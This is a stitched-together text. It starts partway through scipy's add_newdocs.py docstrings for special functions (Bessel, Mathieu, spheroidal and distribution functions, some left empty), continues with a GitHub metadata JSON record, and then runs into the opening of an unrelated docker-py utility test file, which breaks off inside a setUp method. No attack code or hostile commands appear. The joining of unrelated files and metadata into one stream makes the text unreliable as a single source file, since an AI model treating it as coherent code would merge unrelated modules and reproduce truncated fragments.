Returns
-------
y
Value of the function
err
Error estimate
""")
add_newdoc("scipy.special", "hyp2f1",
"""
hyp2f1(a, b, c, z)
Gauss hypergeometric function 2F1(a, b; c; z).
""")
add_newdoc("scipy.special", "hyp3f0",
"""
hyp3f0(a, b, c, x)
Hypergeometric function 3F0 in y and an error estimate
Returns
-------
y
Value of the function
err
Error estimate
""")
add_newdoc("scipy.special", "hyperu",
"""
hyperu(a, b, x)
Confluent hypergeometric function U(a, b, x) of the second kind
""")
add_newdoc("scipy.special", "i0",
"""
i0(x)
Modified Bessel function of order 0
""")
add_newdoc("scipy.special", "i0e",
"""
i0e(x)
Exponentially scaled modified Bessel function of order 0.
Defined as::
i0e(x) = exp(-abs(x)) * i0(x).
""")
add_newdoc("scipy.special", "i1",
"""
i1(x)
Modified Bessel function of order 1
""")
add_newdoc("scipy.special", "i1e",
"""
i1e(x)
Exponentially scaled modified Bessel function of order 1.
Defined as::
i1e(x) = exp(-abs(x)) * i1(x)
""")
add_newdoc("scipy.special", "it2i0k0",
"""
it2i0k0(x)
Integrals related to modified Bessel functions of order 0
Returns
-------
ii0
``integral((i0(t)-1)/t, t=0..x)``
ik0
``integral(k0(t)/t, t=x..inf)``
""")
add_newdoc("scipy.special", "it2j0y0",
"""
it2j0y0(x)
Integrals related to Bessel functions of order 0
Returns
-------
ij0
``integral((1-j0(t))/t, t=0..x)``
iy0
``integral(y0(t)/t, t=x..inf)``
""")
add_newdoc("scipy.special", "it2struve0",
"""
it2struve0(x)
Integral related to Struve function of order 0
Returns
-------
i
``integral(H0(t)/t, t=x..inf)``
""")
add_newdoc("scipy.special", "itairy",
"""
itairy(x)
Integrals of Airy functions
Calculates the integral of Airy functions from 0 to x
Returns
-------
Apt, Bpt
Integrals for positive arguments
Ant, Bnt
Integrals for negative arguments
""")
add_newdoc("scipy.special", "iti0k0",
"""
iti0k0(x)
Integrals of modified Bessel functions of order 0
Returns simple integrals from 0 to x of the zeroth order modified
Bessel functions i0 and k0.
Returns
-------
ii0, ik0
""")
add_newdoc("scipy.special", "itj0y0",
"""
itj0y0(x)
Integrals of Bessel functions of order 0
Returns simple integrals from 0 to x of the zeroth order Bessel
functions j0 and y0.
Returns
-------
ij0, iy0
""")
add_newdoc("scipy.special", "itmodstruve0",
"""
itmodstruve0(x)
Integral of the modified Struve function of order 0
Returns
-------
i
``integral(L0(t), t=0..x)``
""")
add_newdoc("scipy.special", "itstruve0",
"""
itstruve0(x)
Integral of the Struve function of order 0
Returns
-------
i
``integral(H0(t), t=0..x)``
""")
add_newdoc("scipy.special", "iv",
"""
iv(v,z)
Modified Bessel function of the first kind of real order
Parameters
----------
v
Order. If z is of real type and negative, v must be integer valued.
z
Argument.
""")
add_newdoc("scipy.special", "ive",
"""
ive(v,z)
Exponentially scaled modified Bessel function of the first kind
Defined as::
ive(v,z) = iv(v,z) * exp(-abs(z.real))
""")
add_newdoc("scipy.special", "j0",
"""
j0(x)
Bessel function of the first kind of order 0
""")
add_newdoc("scipy.special", "j1",
"""
j1(x)
Bessel function of the first kind of order 1
""")
add_newdoc("scipy.special", "jn",
"""
jn(n, x)
Bessel function of the first kind of integer order n
""")
add_newdoc("scipy.special", "jv",
"""
jv(v, z)
Bessel function of the first kind of real order v
""")
add_newdoc("scipy.special", "jve",
"""
jve(v, z)
Exponentially scaled Bessel function of order v
Defined as::
jve(v,z) = jv(v,z) * exp(-abs(z.imag))
""")
add_newdoc("scipy.special", "k0",
"""
k0(x)
Modified Bessel function K of order 0
Modified Bessel function of the second kind (sometimes called the
third kind) of order 0.
""")
add_newdoc("scipy.special", "k0e",
"""
k0e(x)
Exponentially scaled modified Bessel function K of order 0
Defined as::
k0e(x) = exp(x) * k0(x).
""")
add_newdoc("scipy.special", "k1",
"""
k1(x)
Modified Bessel function of the second kind of order 1
""")
add_newdoc("scipy.special", "k1e",
"""
k1e(x)
Exponentially scaled modified Bessel function K of order 1
Defined as::
k1e(x) = exp(x) * k1(x)
""")
add_newdoc("scipy.special", "kei",
"""
kei(x)
Kelvin function kei
""")
add_newdoc("scipy.special", "keip",
"""
keip(x)
Derivative of the Kelvin function kei
""")
add_newdoc("scipy.special", "kelvin",
"""
kelvin(x)
Kelvin functions as complex numbers
Returns
-------
Be, Ke, Bep, Kep
The tuple (Be, Ke, Bep, Kep) contains complex numbers
representing the real and imaginary Kelvin functions and their
derivatives evaluated at x. For example, kelvin(x)[0].real =
ber x and kelvin(x)[0].imag = bei x with similar relationships
for ker and kei.
""")
add_newdoc("scipy.special", "ker",
"""
ker(x)
Kelvin function ker
""")
add_newdoc("scipy.special", "kerp",
"""
kerp(x)
Derivative of the Kelvin function ker
""")
add_newdoc("scipy.special", "kn",
"""
kn(n, x)
Modified Bessel function of the second kind of integer order n
These are also sometimes called functions of the third kind.
""")
add_newdoc("scipy.special", "kolmogi",
"""
kolmogi(p)
Inverse function to kolmogorov
Returns y such that ``kolmogorov(y) == p``.
""")
add_newdoc("scipy.special", "kolmogorov",
"""
kolmogorov(y)
Complementary cumulative distribution function of Kolmogorov distribution
Returns the complementary cumulative distribution function of
Kolmogorov's limiting distribution (Kn* for large n) of a
two-sided test for equality between an empirical and a theoretical
distribution. It is equal to the (limit as n->infinity of the)
probability that sqrt(n) * max absolute deviation > y.
""")
add_newdoc("scipy.special", "kv",
"""
kv(v,z)
Modified Bessel function of the second kind of real order v
Returns the modified Bessel function of the second kind (sometimes
called the third kind) for real order v at complex z.
""")
add_newdoc("scipy.special", "kve",
"""
kve(v,z)
Exponentially scaled modified Bessel function of the second kind.
Returns the exponentially scaled, modified Bessel function of the
second kind (sometimes called the third kind) for real order v at
complex z::
kve(v,z) = kv(v,z) * exp(z)
""")
add_newdoc("scipy.special", "log1p",
"""
log1p(x)
Calculates log(1+x) for use when x is near zero
""")
add_newdoc('scipy.special', 'logit',
"""
logit(x)
Logit ufunc for ndarrays.
The logit function is defined as logit(p) = log(p/(1-p)).
Note that logit(0) = -inf, logit(1) = inf, and logit(p)
for p<0 or p>1 yields nan.
.. versionadded:: 0.10.0
Parameters
----------
x : ndarray
The ndarray to apply logit to element-wise.
Returns
-------
out : ndarray
An ndarray of the same shape as x. Its entries
are logit of the corresponding entry of x.
Notes
-----
As a ufunc logit takes a number of optional
keyword arguments. For more information
see `ufuncs <http://docs.scipy.org/doc/numpy/reference/ufuncs.html>`_
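Examples
--------
`logit` is the inverse of `expit` and vanishes at the midpoint:
>>> from scipy.special import logit
>>> logit(0.5)
0.0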
""")
add_newdoc("scipy.special", "lpmv",
"""
lpmv(m, v, x)
Associated Legendre function of integer order.
Parameters
----------
m : int
Order
v : real
Degree. Must be ``v>-m-1`` or ``v<m``
x : complex
Argument. Must be ``|x| <= 1``.
""")
add_newdoc("scipy.special", "mathieu_a",
"""
mathieu_a(m,q)
Characteristic value of even Mathieu functions
Returns the characteristic value for the even solution,
``ce_m(z,q)``, of Mathieu's equation.
""")
add_newdoc("scipy.special", "mathieu_b",
"""
mathieu_b(m,q)
Characteristic value of odd Mathieu functions
Returns the characteristic value for the odd solution,
``se_m(z,q)``, of Mathieu's equation.
""")
add_newdoc("scipy.special", "mathieu_cem",
"""
mathieu_cem(m,q,x)
Even Mathieu function and its derivative
Returns the even Mathieu function, ``ce_m(x,q)``, of order m and
parameter q evaluated at x (given in degrees). Also returns the
derivative with respect to x of ce_m(x,q)
Parameters
----------
m
Order of the function
q
Parameter of the function
x
Argument of the function, *given in degrees, not radians*
Returns
-------
y
Value of the function
yp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "mathieu_modcem1",
"""
mathieu_modcem1(m, q, x)
Even modified Mathieu function of the first kind and its derivative
Evaluates the even modified Mathieu function of the first kind,
``Mc1m(x,q)``, and its derivative at `x` for order m and parameter
`q`.
Returns
-------
y
Value of the function
yp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "mathieu_modcem2",
"""
mathieu_modcem2(m, q, x)
Even modified Mathieu function of the second kind and its derivative
Evaluates the even modified Mathieu function of the second kind,
Mc2m(x,q), and its derivative at x (given in degrees) for order m
and parameter q.
Returns
-------
y
Value of the function
yp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "mathieu_modsem1",
"""
mathieu_modsem1(m,q,x)
Odd modified Mathieu function of the first kind and its derivative
Evaluates the odd modified Mathieu function of the first kind,
Ms1m(x,q), and its derivative at x (given in degrees) for order m
and parameter q.
Returns
-------
y
Value of the function
yp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "mathieu_modsem2",
"""
mathieu_modsem2(m, q, x)
Odd modified Mathieu function of the second kind and its derivative
Evaluates the odd modified Mathieu function of the second kind,
Ms2m(x,q), and its derivative at x (given in degrees) for order m
and parameter q.
Returns
-------
y
Value of the function
yp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "mathieu_sem",
"""
mathieu_sem(m, q, x)
Odd Mathieu function and its derivative
Returns the odd Mathieu function, se_m(x,q), of order m and
parameter q evaluated at x (given in degrees). Also returns the
derivative with respect to x of se_m(x,q).
Parameters
----------
m
Order of the function
q
Parameter of the function
x
Argument of the function, *given in degrees, not radians*.
Returns
-------
y
Value of the function
yp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "modfresnelm",
"""
modfresnelm(x)
Modified Fresnel negative integrals
Returns
-------
fm
Integral ``F_-(x)``: ``integral(exp(-1j*t*t),t=x..inf)``
km
Integral ``K_-(x)``: ``1/sqrt(pi)*exp(1j*(x*x+pi/4))*fp``
""")
add_newdoc("scipy.special", "modfresnelp",
"""
modfresnelp(x)
Modified Fresnel positive integrals
Returns
-------
fp
Integral ``F_+(x)``: ``integral(exp(1j*t*t),t=x..inf)``
kp
Integral ``K_+(x)``: ``1/sqrt(pi)*exp(-1j*(x*x+pi/4))*fp``
""")
add_newdoc("scipy.special", "modstruve",
"""
modstruve(v, x)
Modified Struve function
    Returns the modified Struve function Lv(x) of order v at x; x must
    be positive unless v is an integer.
""")
add_newdoc("scipy.special", "nbdtr",
"""
nbdtr(k, n, p)
Negative binomial cumulative distribution function
Returns the sum of the terms 0 through k of the negative binomial
distribution::
sum((n+j-1)Cj p**n (1-p)**j,j=0..k).
In a sequence of Bernoulli trials this is the probability that k
or fewer failures precede the nth success.
""")
add_newdoc("scipy.special", "nbdtrc",
"""
nbdtrc(k,n,p)
Negative binomial survival function
Returns the sum of the terms k+1 to infinity of the negative
binomial distribution.
""")
add_newdoc("scipy.special", "nbdtri",
"""
nbdtri(k, n, y)
Inverse of nbdtr vs p
Finds the argument p such that ``nbdtr(k,n,p) = y``.
""")
add_newdoc("scipy.special", "nbdtrik",
"""
nbdtrik(y,n,p)
Inverse of nbdtr vs k
Finds the argument k such that ``nbdtr(k,n,p) = y``.
""")
add_newdoc("scipy.special", "nbdtrin",
"""
nbdtrin(k,y,p)
Inverse of nbdtr vs n
Finds the argument n such that ``nbdtr(k,n,p) = y``.
""")
add_newdoc("scipy.special", "ncfdtr",
"""
""")
add_newdoc("scipy.special", "ncfdtri",
"""
""")
add_newdoc("scipy.special", "ncfdtrifn",
"""
""")
add_newdoc("scipy.special", "ncfdtridfd",
"""
""")
add_newdoc("scipy.special", "ncfdtridfn",
"""
""")
add_newdoc("scipy.special", "ncfdtrinc",
"""
""")
add_newdoc("scipy.special", "nctdtr",
"""
""")
add_newdoc("scipy.special", "nctdtridf",
"""
""")
add_newdoc("scipy.special", "nctdtrinc",
"""
""")
add_newdoc("scipy.special", "nctdtrit",
"""
""")
add_newdoc("scipy.special", "ndtr",
"""
ndtr(x)
Gaussian cumulative distribution function
Returns the area under the standard Gaussian probability
density function, integrated from minus infinity to x::
1/sqrt(2*pi) * integral(exp(-t**2 / 2),t=-inf..x)
""")
add_newdoc("scipy.special", "nrdtrimn",
"""
""")
add_newdoc("scipy.special", "nrdtrisd",
"""
""")
add_newdoc("scipy.special", "log_ndtr",
"""
log_ndtr(x)
Logarithm of Gaussian cumulative distribution function
Returns the log of the area under the standard Gaussian probability
density function, integrated from minus infinity to x::
log(1/sqrt(2*pi) * integral(exp(-t**2 / 2), t=-inf..x))
""")
add_newdoc("scipy.special", "ndtri",
"""
ndtri(y)
Inverse of ndtr vs x
Returns the argument x for which the area under the Gaussian
probability density function (integrated from minus infinity to x)
is equal to y.
""")
add_newdoc("scipy.special", "obl_ang1",
"""
obl_ang1(m, n, c, x)
Oblate spheroidal angular function of the first kind and its derivative
    Computes the oblate spheroidal angular function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "obl_ang1_cv",
"""
obl_ang1_cv(m, n, c, cv, x)
    Oblate spheroidal angular function obl_ang1 for precomputed characteristic value
    Computes the oblate spheroidal angular function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``. Requires
pre-computed characteristic value.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "obl_cv",
"""
obl_cv(m, n, c)
Characteristic value of oblate spheroidal function
Computes the characteristic value of oblate spheroidal wave
functions of order m,n (n>=m) and spheroidal parameter c.
""")
add_newdoc("scipy.special", "obl_rad1",
"""
obl_rad1(m,n,c,x)
Oblate spheroidal radial function of the first kind and its derivative
    Computes the oblate spheroidal radial function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "obl_rad1_cv",
"""
obl_rad1_cv(m,n,c,cv,x)
    Oblate spheroidal radial function obl_rad1 for precomputed characteristic value
    Computes the oblate spheroidal radial function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``. Requires
pre-computed characteristic value.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "obl_rad2",
"""
obl_rad2(m,n,c,x)
Oblate spheroidal radial function of the second kind and its derivative.
    Computes the oblate spheroidal radial function of the second kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "obl_rad2_cv",
"""
obl_rad2_cv(m,n,c,cv,x)
    Oblate spheroidal radial function obl_rad2 for precomputed characteristic value
    Computes the oblate spheroidal radial function of the second kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``. Requires
pre-computed characteristic value.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pbdv",
"""
pbdv(v, x)
Parabolic cylinder function D
Returns (d,dp) the parabolic cylinder function Dv(x) in d and the
derivative, Dv'(x) in dp.
Returns
-------
d
Value of the function
dp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pbvv",
"""
pbvv(v,x)
Parabolic cylinder function V
Returns the parabolic cylinder function Vv(x) in v and the
derivative, Vv'(x) in vp.
Returns
-------
v
Value of the function
vp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pbwa",
"""
pbwa(a,x)
Parabolic cylinder function W
Returns the parabolic cylinder function W(a,x) in w and the
derivative, W'(a,x) in wp.
.. warning::
May not be accurate for large (>5) arguments in a and/or x.
Returns
-------
w
Value of the function
wp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pdtr",
"""
pdtr(k, m)
Poisson cumulative distribution function
Returns the sum of the first k terms of the Poisson distribution:
    sum(exp(-m) * m**j / j!, j=0..k) = gammaincc(k+1, m). Arguments
    must both be positive and k an integer.
""")
add_newdoc("scipy.special", "pdtrc",
"""
pdtrc(k, m)
Poisson survival function
Returns the sum of the terms from k+1 to infinity of the Poisson
    distribution: sum(exp(-m) * m**j / j!, j=k+1..inf) = gammainc(k+1, m).
    Arguments must both be positive and k an integer.
""")
add_newdoc("scipy.special", "pdtri",
"""
pdtri(k,y)
Inverse to pdtr vs m
Returns the Poisson variable m such that the sum from 0 to k of
the Poisson density is equal to the given probability y:
calculated by gammaincinv(k+1, y). k must be a nonnegative
integer and y between 0 and 1.
""")
add_newdoc("scipy.special", "pdtrik",
"""
pdtrik(p,m)
Inverse to pdtr vs k
Returns the quantile k such that ``pdtr(k, m) = p``
""")
add_newdoc("scipy.special", "poch",
"""
poch(z, m)
Rising factorial (z)_m
The Pochhammer symbol (rising factorial), is defined as::
(z)_m = gamma(z + m) / gamma(z)
For positive integer `m` it reads::
(z)_m = z * (z + 1) * ... * (z + m - 1)
""")
add_newdoc("scipy.special", "pro_ang1",
"""
pro_ang1(m,n,c,x)
Prolate spheroidal angular function of the first kind and its derivative
    Computes the prolate spheroidal angular function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pro_ang1_cv",
"""
pro_ang1_cv(m,n,c,cv,x)
    Prolate spheroidal angular function pro_ang1 for precomputed characteristic value
    Computes the prolate spheroidal angular function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``. Requires
pre-computed characteristic value.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pro_cv",
"""
pro_cv(m,n,c)
Characteristic value of prolate spheroidal function
Computes the characteristic value of prolate spheroidal wave
functions of order m,n (n>=m) and spheroidal parameter c.
""")
add_newdoc("scipy.special", "pro_rad1",
"""
pro_rad1(m,n,c,x)
Prolate spheroidal radial function of the first kind and its derivative
    Computes the prolate spheroidal radial function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pro_rad1_cv",
"""
pro_rad1_cv(m,n,c,cv,x)
    Prolate spheroidal radial function pro_rad1 for precomputed characteristic value
    Computes the prolate spheroidal radial function of the first kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``. Requires
pre-computed characteristic value.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pro_rad2",
"""
pro_rad2(m,n,c,x)
    Prolate spheroidal radial function of the second kind and its derivative
    Computes the prolate spheroidal radial function of the second kind
    and its derivative (with respect to x) for mode parameters m>=0
    and n>=m, spheroidal parameter c and ``|x| < 1.0``.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "pro_rad2_cv",
"""
pro_rad2_cv(m,n,c,cv,x)
    Prolate spheroidal radial function pro_rad2 for precomputed characteristic value
    Computes the prolate spheroidal radial function of the second kind
and its derivative (with respect to x) for mode parameters m>=0
and n>=m, spheroidal parameter c and ``|x| < 1.0``. Requires
pre-computed characteristic value.
Returns
-------
s
Value of the function
sp
Value of the derivative vs x
""")
add_newdoc("scipy.special", "psi",
"""
psi(z)
Digamma function
The derivative of the logarithm of the gamma function evaluated at
z (also called the digamma function).
""")
add_newdoc("scipy.special", "radian",
"""
radian(d, m, s)
Convert from degrees to radians
Returns the angle given in (d)egrees, (m)inutes, and (s)econds in
radians.
""")
add_newdoc("scipy.special", "rgamma",
"""
rgamma(z)
    Reciprocal of the gamma function
    Returns ``1/gamma(z)``
""")
add_newdoc("scipy.special", "round",
"""
round(x)
Round to nearest integer
Returns the nearest integer to x as a double precision floating
point result. If x ends in 0.5 exactly, the nearest even integer
is chosen.
""")
add_newdoc("scipy.special", "shichi",
"""
shichi(x)
Hyperbolic sine and cosine integrals
Returns
-------
shi
``integral(sinh(t)/t,t=0..x)``
chi
``eul + ln x + integral((cosh(t)-1)/t,t=0..x)``
where ``eul`` is Euler's constant.
""")
add_newdoc("scipy.special", "sici",
"""
sici(x)
Sine and cosine integrals
Returns
-------
si
``integral(sin(t)/t,t=0..x)``
ci
``eul + ln x + integral((cos(t) - 1)/t,t=0..x)``
where ``eul`` is Euler's constant.
""")
add_newdoc("scipy.special", "sindg",
"""
sindg(x)
Sine of angle given in degrees
""")
add_newdoc("scipy.special", "smirnov",
"""
smirnov(n,e)
Kolmogorov-Smirnov complementary cumulative distribution function
Returns the exact Kolmogorov-Smirnov complementary cumulative
distribution function (Dn+ or Dn-) for a one-sided test of
equality between an empirical and a theoretical distribution. It
is equal to the probability that the maximum difference between a
theoretical distribution and an empirical one based on n samples
is greater than e.
""")
add_newdoc("scipy.special", "smirnovi",
"""
smirnovi(n,y)
Inverse to smirnov
Returns ``e`` such that ``smirnov(n,e) = y``.
""")
add_newdoc("scipy.special", "spence",
"""
spence(x)
Dilogarithm integral
Returns the dilogarithm integral::
-integral(log t / (t-1),t=1..x)
""")
add_newdoc("scipy.special", "stdtr",
"""
stdtr(df,t)
    Student t distribution cumulative distribution function
Returns the integral from minus infinity to t of the Student t
distribution with df > 0 degrees of freedom::
gamma((df+1)/2)/(sqrt(df*pi)*gamma(df/2)) *
integral((1+x**2/df)**(-df/2-1/2), x=-inf..t)
""")
add_newdoc("scipy.special", "stdtridf",
"""
stdtridf(p,t)
Inverse of stdtr vs df
Returns the argument df such that stdtr(df,t) is equal to p.
""")
add_newdoc("scipy.special", "stdtrit",
"""
stdtrit(df,p)
Inverse of stdtr vs t
Returns the argument t such that stdtr(df,t) is equal to p.
""")
add_newdoc("scipy.special", "struve",
"""
struve(v,x)
Struve function
    Computes the Struve function Hv(x) of order v at x; x must be
    positive unless v is an integer.
""")
add_newdoc("scipy.special", "tandg",
"""
tandg(x)
Tangent of angle x given in degrees.
""")
add_newdoc("scipy.special", "tklmbda",
"""
tklmbda(x, lmbda)
Tukey-Lambda cumulative distribution function
""")
add_newdoc("scipy.special", "wofz",
"""
wofz(z)
Faddeeva function
Returns the value of the Faddeeva function for complex argument::
exp(-z**2)*erfc(-i*z)
References
----------
.. [1] Steven G. Johnson, Faddeeva W function implementation.
http://ab-initio.mit.edu/Faddeeva
""")
add_newdoc("scipy.special", "xlogy",
"""
xlogy(x, y)
Compute ``x*log(y)`` so that the result is 0 if `x = 0`.
.. versionadded:: 0.13.0
Parameters
----------
x : array_like
Multiplier
y : array_like
Argument
Returns
-------
z : array_like
Computed x*log(y)
""")
add_newdoc("scipy.special", "xlog1py",
"""
xlog1py(x, y)
Compute ``x*log1p(y)`` so that the result is 0 if `x = 0`.
.. versionadded:: 0.13.0
Parameters
----------
x : array_like
Multiplier
y : array_like
Argument
Returns
-------
z : array_like
Computed x*log1p(y)
""")
add_newdoc("scipy.special", "y0",
"""
y0(x)
Bessel function of the second kind of order 0
Returns the Bessel function of the second kind of order 0 at x.
""")
add_newdoc("scipy.special", "y1",
"""
y1(x)
Bessel function of the second kind of order 1
Returns the Bessel function of the second kind of order 1 at x.
""")
add_newdoc("scipy.special", "yn",
"""
yn(n,x)
Bessel function of the second kind of integer order
Returns the Bessel function of the second kind of integer order n
at x.
""")
add_newdoc("scipy.special", "yv",
"""
yv(v,z)
Bessel function of the second kind of real order
Returns the Bessel function of the second kind of real order v at
complex z.
""")
add_newdoc("scipy.special", "yve",
"""
yve(v,z)
Exponentially scaled Bessel function of the second kind of real order
Returns the exponentially scaled Bessel function of the second
kind of real order v at complex z::
yve(v,z) = yv(v,z) * exp(-abs(z.imag))
""")
add_newdoc("scipy.special", "zeta",
"""
zeta(x, q)
Hurwitz zeta function
The Riemann zeta function of two arguments (also known as the
    Hurwitz zeta function).
This function is defined as
.. math:: \\zeta(x, q) = \\sum_{k=0}^{\\infty} 1 / (k+q)^x,
where ``x > 1`` and ``q > 0``.
See also
--------
zetac
""")
add_newdoc("scipy.special", "zetac",
"""
zetac(x)
Riemann zeta function minus 1.
    This function is defined as
    .. math:: \\zeta_c(x) = \\zeta(x) - 1 = \\sum_{k=2}^{\\infty} 1 / k^x,
where ``x > 1``.
See Also
--------
zeta
""")
add_newdoc("scipy.special", "_struve_asymp_large_z",
"""
_struve_asymp_large_z(v, z, is_h)
Internal function for testing struve & modstruve
Evaluates using asymptotic expansion
Returns
-------
v, err
""")
add_newdoc("scipy.special", "_struve_power_series",
"""
_struve_power_series(v, z, is_h)
Internal function for testing struve & modstruve
Evaluates using power series
Returns
-------
v, err
""")
add_newdoc("scipy.special", "_struve_bessel_series",
"""
_struve_bessel_series(v, z, is_h)
Internal function for testing struve & modstruve
Evaluates using Bessel function series
Returns
-------
v, err
""")
| {
"content_hash": "a6f4e6d0bdf80dcbfd0b528988f9d801",
"timestamp": "",
"source": "github",
"line_count": 2732,
"max_line_length": 84,
"avg_line_length": 20.612005856515374,
"alnum_prop": 0.5819896292086945,
"repo_name": "RobertABT/heightmap",
"id": "a1027263104d6c57e5606133be607c210db75d31",
"size": "56683",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "build/scipy/scipy/special/add_newdocs.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "25165856"
},
{
"name": "C++",
"bytes": "5251754"
},
{
"name": "CSS",
"bytes": "17123"
},
{
"name": "FORTRAN",
"bytes": "6353469"
},
{
"name": "JavaScript",
"bytes": "816504"
},
{
"name": "M",
"bytes": "66"
},
{
"name": "Matlab",
"bytes": "4280"
},
{
"name": "Objective-C",
"bytes": "284551"
},
{
"name": "Python",
"bytes": "13223936"
},
{
"name": "TeX",
"bytes": "37261"
}
],
"symlink_target": ""
} |
# -*- coding: utf-8 -*-
import base64
import json
import os
import os.path
import shutil
import tempfile
import pytest
import six
from docker.client import Client
from docker.constants import DEFAULT_DOCKER_API_VERSION
from docker.errors import DockerException
from docker.utils import (
parse_repository_tag, parse_host, convert_filters, kwargs_from_env,
create_host_config, Ulimit, LogConfig, parse_bytes, parse_env_file,
exclude_paths, convert_volume_binds, decode_json_header
)
from docker.utils.ports import build_port_bindings, split_port
from docker.auth import (
resolve_repository_name, resolve_authconfig, encode_header
)
from . import base
from .helpers import make_tree
TEST_CERT_DIR = os.path.join(
os.path.dirname(__file__),
'testdata/certs',
)
class HostConfigTest(base.BaseTestCase):
def test_create_host_config_no_options(self):
config = create_host_config(version='1.19')
self.assertFalse('NetworkMode' in config)
def test_create_host_config_no_options_newer_api_version(self):
config = create_host_config(version='1.20')
self.assertEqual(config['NetworkMode'], 'default')
def test_create_host_config_invalid_cpu_cfs_types(self):
with pytest.raises(TypeError):
create_host_config(version='1.20', cpu_quota='0')
with pytest.raises(TypeError):
create_host_config(version='1.20', cpu_period='0')
with pytest.raises(TypeError):
create_host_config(version='1.20', cpu_quota=23.11)
with pytest.raises(TypeError):
create_host_config(version='1.20', cpu_period=1999.0)
def test_create_host_config_with_cpu_quota(self):
config = create_host_config(version='1.20', cpu_quota=1999)
self.assertEqual(config.get('CpuQuota'), 1999)
def test_create_host_config_with_cpu_period(self):
config = create_host_config(version='1.20', cpu_period=1999)
self.assertEqual(config.get('CpuPeriod'), 1999)
class UlimitTest(base.BaseTestCase):
def test_create_host_config_dict_ulimit(self):
ulimit_dct = {'name': 'nofile', 'soft': 8096}
config = create_host_config(
ulimits=[ulimit_dct], version=DEFAULT_DOCKER_API_VERSION
)
self.assertIn('Ulimits', config)
self.assertEqual(len(config['Ulimits']), 1)
ulimit_obj = config['Ulimits'][0]
self.assertTrue(isinstance(ulimit_obj, Ulimit))
self.assertEqual(ulimit_obj.name, ulimit_dct['name'])
self.assertEqual(ulimit_obj.soft, ulimit_dct['soft'])
self.assertEqual(ulimit_obj['Soft'], ulimit_obj.soft)
def test_create_host_config_dict_ulimit_capitals(self):
ulimit_dct = {'Name': 'nofile', 'Soft': 8096, 'Hard': 8096 * 4}
config = create_host_config(
ulimits=[ulimit_dct], version=DEFAULT_DOCKER_API_VERSION
)
self.assertIn('Ulimits', config)
self.assertEqual(len(config['Ulimits']), 1)
ulimit_obj = config['Ulimits'][0]
self.assertTrue(isinstance(ulimit_obj, Ulimit))
self.assertEqual(ulimit_obj.name, ulimit_dct['Name'])
self.assertEqual(ulimit_obj.soft, ulimit_dct['Soft'])
self.assertEqual(ulimit_obj.hard, ulimit_dct['Hard'])
self.assertEqual(ulimit_obj['Soft'], ulimit_obj.soft)
def test_create_host_config_obj_ulimit(self):
ulimit_dct = Ulimit(name='nofile', soft=8096)
config = create_host_config(
ulimits=[ulimit_dct], version=DEFAULT_DOCKER_API_VERSION
)
self.assertIn('Ulimits', config)
self.assertEqual(len(config['Ulimits']), 1)
ulimit_obj = config['Ulimits'][0]
self.assertTrue(isinstance(ulimit_obj, Ulimit))
self.assertEqual(ulimit_obj, ulimit_dct)
def test_ulimit_invalid_type(self):
self.assertRaises(ValueError, lambda: Ulimit(name=None))
self.assertRaises(ValueError, lambda: Ulimit(name='hello', soft='123'))
self.assertRaises(ValueError, lambda: Ulimit(name='hello', hard='456'))
class LogConfigTest(base.BaseTestCase):
def test_create_host_config_dict_logconfig(self):
dct = {'type': LogConfig.types.SYSLOG, 'config': {'key1': 'val1'}}
config = create_host_config(
version=DEFAULT_DOCKER_API_VERSION, log_config=dct
)
self.assertIn('LogConfig', config)
self.assertTrue(isinstance(config['LogConfig'], LogConfig))
self.assertEqual(dct['type'], config['LogConfig'].type)
def test_create_host_config_obj_logconfig(self):
obj = LogConfig(type=LogConfig.types.SYSLOG, config={'key1': 'val1'})
config = create_host_config(
version=DEFAULT_DOCKER_API_VERSION, log_config=obj
)
self.assertIn('LogConfig', config)
self.assertTrue(isinstance(config['LogConfig'], LogConfig))
self.assertEqual(obj, config['LogConfig'])
def test_logconfig_invalid_config_type(self):
with pytest.raises(ValueError):
LogConfig(type=LogConfig.types.JSON, config='helloworld')
class KwargsFromEnvTest(base.BaseTestCase):
def setUp(self):
